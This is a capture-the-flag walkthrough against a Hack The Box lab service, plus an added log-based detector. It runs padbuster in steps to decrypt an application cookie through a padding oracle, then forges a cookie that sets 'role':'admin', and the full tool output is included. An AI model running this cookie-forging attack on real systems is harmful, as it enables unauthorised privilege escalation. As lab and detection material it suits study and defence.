-------------------------------------------------------------------------------------------------------------------
STEP 1
padbuster http://docker.hackthebox.eu:37742 zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D --cookies "PHPSESSID=7d5guetet0tj3o1kn8lrd77da0;iknowmag1k=zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D" 8 --encoding=0
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 256 302 0 profile.php
-------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------
STEP 2
padbuster http://docker.hackthebox.eu:37742/profile.php zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D --cookies "PHPSESSID=7d5guetet0tj3o1kn8lrd77da0;iknowmag1k=zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D" 8 --encoding=0
** Finished ***
[+] Decrypted value (ASCII): {"user":"bdmin","role":"user"}
[+] Decrypted value (HEX): 7B2275736572223A2262646D696E222C22726F6C65223A2275736572227D0202
[+] Decrypted value (Base64): eyJ1c2VyIjoiYmRtaW4iLCJyb2xlIjoidXNlciJ9AgI=
-----------------------------------------------------------------------------------------------------------------
STEP 3
padbuster http://docker.hackthebox.eu:37742/profile.php zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D --cookies "PHPSESSID=7d5guetet0tj3o1kn8lrd77da0;iknowmag1k=zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D" 8 --encoding=0 --plaintext "{\"user\":\"admin\",\"role\":\"admin\"}"
** Finished ***
[+] Encrypted value is: LDRCU61StZbYrdIXPROTGIprI45i7IsYMAovrw2IGp8AAAAAAAAAAA%3D%3D
------------------------------------------------------------------------------------------------------------------
STEP 4
We set the iknowmag1k cookie to the newly encrypted value, whose plaintext has "role":"admin", and we find the flag.
========================================================================
Full transcript
:~$ padbuster http://docker.hackthebox.eu:37742/profile.php zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D --cookies "PHPSESSID=7d5guetet0tj3o1kn8lrd77da0;iknowmag1k=zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D" 8 --encoding=0
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 3846
INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 4 ***
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 200 3846 N/A
2 ** 255 500 2203 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (188/256) [Byte 8]
[+] Success: (230/256) [Byte 7]
[+] Success: (10/256) [Byte 6]
[+] Success: (3/256) [Byte 5]
[+] Success: (10/256) [Byte 4]
[+] Success: (224/256) [Byte 3]
[+] Success: (226/256) [Byte 2]
[+] Success: (67/256) [Byte 1]
Block 1 Results:
[+] Cipher Text (HEX): 58c562c826efa7a0
[+] Intermediate Bytes (HEX): b51926f3f9f51845
[+] Plain Text: {"user":
Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 1.
*** Starting Block 2 of 4 ***
[+] Success: (115/256) [Byte 8]
[+] Success: (121/256) [Byte 7]
[+] Success: (126/256) [Byte 6]
[+] Success: (181/256) [Byte 5]
[+] Success: (96/256) [Byte 4]
[+] Success: (256/256) [Byte 3]
[+] Success: (96/256) [Byte 2]
[+] Success: (142/256) [Byte 1]
Block 2 Results:
[+] Cipher Text (HEX): 31a52fdbef978446
[+] Intermediate Bytes (HEX): 7aa706a54f81858c
[+] Plain Text: "bdmin",
*** Starting Block 3 of 4 ***
[+] Success: (155/256) [Byte 8]
[+] Success: (68/256) [Byte 7]
[+] Success: (74/256) [Byte 6]
[+] Success: (114/256) [Byte 5]
[+] Success: (78/256) [Byte 4]
[+] Success: (186/256) [Byte 3]
[+] Success: (48/256) [Byte 2]
[+] Success: (229/256) [Byte 1]
Block 3 Results:
[+] Cipher Text (HEX): 566e38a2cbe1617c
[+] Intermediate Bytes (HEX): 13d740b78ab5be64
[+] Plain Text: "role":"
*** Starting Block 4 of 4 ***
[+] Success: (129/256) [Byte 8]
[+] Success: (159/256) [Byte 7]
[+] Success: (97/256) [Byte 6]
[+] Success: (19/256) [Byte 5]
[+] Success: (43/256) [Byte 4]
[+] Success: (165/256) [Byte 3]
[+] Success: (230/256) [Byte 2]
[+] Success: (213/256) [Byte 1]
Block 4 Results:
[+] Cipher Text (HEX): 409071862aba0508
[+] Intermediate Bytes (HEX): 231d5dd0e99c637e
[+] Plain Text: user"}
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): {"user":"bdmin","role":"user"}
[+] Decrypted value (HEX): 7B2275736572223A2262646D696E222C22726F6C65223A2275736572227D0202
[+] Decrypted value (Base64): eyJ1c2VyIjoiYmRtaW4iLCJyb2xlIjoidXNlciJ9AgI=
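For defenders, the response analysis above (255 of 256 tampered cookies answered with status 500, one with 200) is also what this activity looks like in server logs. The following is an added example, not part of the original post: a detector that flags a client sending many distinct cookie values to one path and receiving errors for almost all of them. The log format, client addresses, cookie hashes and thresholds are assumptions made for the example.

```python
from collections import defaultdict

def parse(line):
    # Constructed format: "<epoch> <client> <path> <status> <cookie_hash>"
    ts, client, path, status, cookie_id = line.split()
    return int(ts), client, path, int(status), cookie_id

def find_oracle_probing(lines, window=60, min_distinct=50, min_error_ratio=0.9):
    """Flag (client, path) pairs that, within `window` seconds, present at
    least `min_distinct` different cookie values and get 5xx responses for
    at least `min_error_ratio` of those requests. Thresholds are assumptions."""
    by_key = defaultdict(list)
    for line in lines:
        ts, client, path, status, cookie_id = parse(line)
        by_key[(client, path)].append((ts, status, cookie_id))
    alerts = []
    for (client, path), events in by_key.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until it spans <= `window` seconds.
            while events[end][0] - events[start][0] > window:
                start += 1
            win = events[start:end + 1]
            distinct = {cookie for _, _, cookie in win}
            errors = sum(1 for _, status, _ in win if status >= 500)
            if len(distinct) >= min_distinct and errors / len(win) >= min_error_ratio:
                alerts.append((client, path, len(distinct), errors))
                break  # one alert per client and path is enough
    return alerts

def sample_log():
    # Constructed data: one client cycling 256 cookie values (255 x 500, 1 x 200,
    # as in the response analysis above) and one ordinary session with a fixed cookie.
    lines = [f"{1000 + i // 10} 10.0.0.5 /profile.php "
             f"{200 if i == 187 else 500} c{i:04x}" for i in range(256)]
    lines += [f"{1000 + 5 * i} 10.0.0.9 /profile.php "
              f"{500 if i == 3 else 200} a1b2" for i in range(12)]
    return lines

if __name__ == "__main__":
    for alert in find_oracle_probing(sample_log()):
        print("possible padding-oracle probing:", alert)
```

The detector keys on distinct cookie values rather than raw request count, so a single session that repeatedly hits a broken page with the same cookie is not flagged.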